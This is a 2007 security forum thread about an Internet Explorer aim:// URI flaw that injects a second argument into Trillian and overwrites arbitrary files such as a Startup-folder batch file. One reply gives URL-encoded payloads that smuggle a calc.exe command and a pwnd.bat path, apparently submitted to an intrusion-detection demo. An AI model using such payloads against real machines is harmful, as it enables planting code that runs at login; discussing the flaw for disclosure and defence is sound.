Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: nmcfeters
Date: July 13, 2007 03:25AM

Let the Trillian-sploitation continue!

This one is hilarious, so I have to post it. IE allows an attacker to perform a command injection into the arguments passed to Trillian thru rundll32 when calling the aim:// URI. By closing off the first command line argument (url), an attacker can supply there own value for the second command line argument (ini). Trillian will take an arbitrary file location for this paramater and overwrite it with everything prior to the ini arg.

See PoC (http://www.xs-sniper.com/nmcfeters/Cross-App-Scripting-2.html) at BK Rios's xs-sniper.com site.

Options: ReplyQuote
Re: Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: Anonymous User
Date: July 13, 2007 12:22PM

Wow - again awesome and frightening find. Good work!

BTW:

http://demo.php-ids.org/?test=aim:%20&c:%5cwindows%5csystem32%5ccalc.exe%2522%2520ini=%2522C:%5cDocuments%2520and%2520Settings%5cAll%2520Users%5cStart%2520Menu%5cPrograms%5cStartup%5cpwnd.bat%2522
http://demo.php-ids.org/?test=aim:///%231111111/11111111111111111111111111111111111111111111111111111111111112222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222226666666AAAABBBB6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666

;)

Greetings,
.mario



Edited 2 time(s). Last edit at 07/13/2007 12:25PM by .mario.

Options: ReplyQuote
Re: Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: nmcfeters
Date: July 13, 2007 02:49PM

Good to see that someone cares about protecting people from this stuff.

Options: ReplyQuote
Re: Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: Anonymous User
Date: July 13, 2007 06:05PM

Ya - I am a little bit confused about the lack of reaction. I mean LFE/RFE is one of the most serious issues in client security. Is this possible with current versions of Trillian? Is the bug reported? If yes what did the developers say?

Greetings,
.mario

Options: ReplyQuote
Re: Cross Application Scripting (IE pwns Trillian pwns Startup Folder pwns All Users)
Posted by: nmcfeters
Date: July 14, 2007 12:28AM

See my recent post. More evidence its not just any one person's fault.

Options: ReplyQuote


Sorry, only registered users may post in this forum.